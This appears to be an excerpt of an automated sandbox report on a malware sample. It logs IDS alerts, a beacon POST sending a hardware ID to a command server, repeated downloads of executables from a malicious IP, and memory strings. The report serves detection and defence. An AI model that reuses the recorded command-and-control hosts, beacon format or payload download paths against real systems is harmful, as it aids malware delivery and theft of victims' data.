Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 35 35 43 37 39 45 34 46 33 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="hwid"A55C79E4F37B1953448019------JJDBGDHIIDAEBFHJJDBFContent-Disposition: form-data; name="build"doma------JJDBGDHIIDAEBFHJJDBF--
Source: Joe Sandbox View IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 34.117.188.166 34.117.188.166
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49744 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49994 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49997 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50001 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50007 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50007 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50053 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://cdn.branch.io/branch-latest.min.js**://pub.doubleverify.com/signals/pub.js**://static.chartbeat.com/js/chartbeat_video.js*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://c.amazon-adsystem.com/aax2/apstag.js*://auth.9c9media.ca/auth/main.js*://track.adform.net/serving/scripts/trackpoint/*://*.imgur.io/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js**://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/all.js**://www.google-analytics.com/analytics.js**://static.chartbeat.com/js/chartbeat.js*://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://id.rambler.ru/rambler-id-helper/auth_events.jsdisabled_picture_in_picture_overrides.dailymotiondisabled_picture_in_picture_overrides.washingtonpost*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js*://www.googleadservices.com/pagead/conversion_async.js equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.0000017085290000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/firefoxview-tabpickup-password-locked-primarybutton equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3308589953.0000017084AD2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084D53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: file.exe, 00000000.00000003.2134302834.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=14a069e6677fb5a07d6a2b8f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 16:09:17 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: file.exe, 00000000.00000003.2134448591.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=cfac046760478cb378cd12f6; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35741Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 16:08:01 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B06000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/passwordmgr-storage-replace did not match due to targeting_generateVariablesOnlySchemaupdateSessionStoreForStorageSSF_updateSessionStoreForStorage equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/passwordmgr-storage-replace did not match due to targeting_generateVariablesOnlySchemaupdateSessionStoreForStorageSSF_updateSessionStoreForStoragensIFinalizationWitnessService equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
